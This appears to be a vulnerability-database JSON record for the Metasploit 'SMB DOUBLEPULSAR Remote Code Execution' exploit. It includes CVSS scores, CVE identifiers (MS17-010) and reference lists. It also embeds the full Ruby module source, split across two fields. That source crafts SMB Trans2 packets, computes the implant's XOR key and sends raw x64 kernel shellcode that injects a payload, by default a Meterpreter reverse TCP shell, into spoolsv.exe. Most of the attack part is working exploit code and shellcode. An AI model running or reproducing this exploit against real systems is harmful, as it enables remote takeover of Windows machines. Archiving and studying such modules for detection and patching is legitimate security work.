ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack('S<')\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n"}, "lastseen": "2021-11-12T17:48:41", "differentElements": ["sourceData"], "edition": 68}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "2af769d2f0f395f48de4732f348253ce", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-11-14T09:51:16", "history": [], "viewCount": 114, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM", "MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96703", "SMNTC-96706"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0419", "CPAI-2017-0177", "CPAI-2017-0200", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-12T17:48:41", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-12T17:48:41", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": ""}, "lastseen": "2021-11-14T09:51:16", "differentElements": ["sourceData"], "edition": 69}], "viewCount": 115, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL", "700059.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-14T11:47:36", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-14T11:47:36", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Module::Deprecated\n\n moved_from 'exploit/windows/smb/doublepulsar_rce'\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload (x64)',\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ],\n ['Neutralize implant',\n 'DefaultOptions' => {\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_OS_DOWN],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }.freeze\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }.freeze\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack1('V')\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n print_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg 